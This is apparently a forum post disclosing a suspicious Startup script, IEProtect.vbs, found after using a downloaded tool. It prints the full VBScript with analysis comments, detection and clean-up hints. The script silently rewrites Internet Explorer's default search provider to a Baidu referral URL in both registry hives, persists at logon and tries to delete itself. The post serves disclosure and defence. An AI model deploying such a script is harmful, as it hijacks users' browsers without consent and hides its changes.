Download from: http://bbs.wuyou.net/forum.php?mod=viewthread&tid=117016
After using it, I found a suspicious file on the system:
%userprofile%\appdata\roaming\Micros~1\Windows\StartM~1\Programs\Startup\IEProtect.vbs
Contents of IEProtect.vbs:
' IEProtect.vbs -- analysis notes on the sample as posted (code left byte-identical).
' Purpose, as far as the listing shows: on every run it overwrites Internet Explorer's
' default search provider with a Baidu entry, in both the per-user (HKCU) and the
' machine-wide (HKLM) hive, then tries to delete a copy of itself from a Startup folder.
' Because the file sits in a Startup folder, it runs at each logon, so a manually
' restored search provider is overwritten again at the next logon.
'
' Detection hint: wscript.exe started from a Startup folder that spawns
' "cmd /c reg add" against ...\Internet Explorer\SearchScopes.
' Clean-up hint: remove the Startup copy of the script, delete the
' {57441393-1EAF-4587-B23F-60B1E960833F} subkey under SearchScopes in both hives, and
' point DefaultScope back at a provider the user actually chose.
'
' Every command goes through ws.run without the third (wait) argument, so the commands
' are launched without waiting for the previous one to finish.
' NOTE(review): vbhide does not appear to be a built-in VBScript constant; as an
' undeclared variable it would evaluate to Empty (0), which Run treats as a hidden
' window -- the net effect is that no console window is shown to the user.
Set ws = CreateObject("Wscript.Shell")
' --- Per-user hive (HKCU): writable by the logged-on user ---
' Select the GUID below as the default search provider (/f overwrites without prompting).
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
' Set the Version value of the SearchScopes key to DWORD 1.
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v Version /t REG_DWORD /d 1 /f",vbhide
' Create the provider entry under that GUID and label it "baidu".
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
' Search URL template for the provider. The tn=winpe_pg parameter is presumably a
' referral/channel tag tied to the distributor -- not verifiable from this listing.
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
' --- Machine-wide hive (HKLM): same provider for all users ---
' These writes normally need administrative rights; any failure is invisible because
' the window is hidden and the exit code is never checked. No Version value is
' written here, unlike the HKCU section above.
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
' --- Self-removal attempt ---
' Clear the system/hidden/read-only/archive attributes on a copy of this script in the
' All Users Startup folder, then delete it quietly (/q). The folder name is the
' Chinese-localized "Start Menu\Programs\Startup" under %allusersprofile%.
' NOTE(review): this is not the path where the file was reported
' (%userprofile%\appdata\roaming\...\Startup), so on that system the delete presumably
' misses the reported copy and the script keeps running at logon. Since attrib and del
' are started without waiting, their order is also not guaranteed.
ws.run "cmd /c attrib -s -h -r -a ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs""",vbhide
ws.run "cmd /c del ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs"" /q",vbhide
[ 本帖最后由 tanjianwen 于 2010-5-16 03:30 编辑 ] |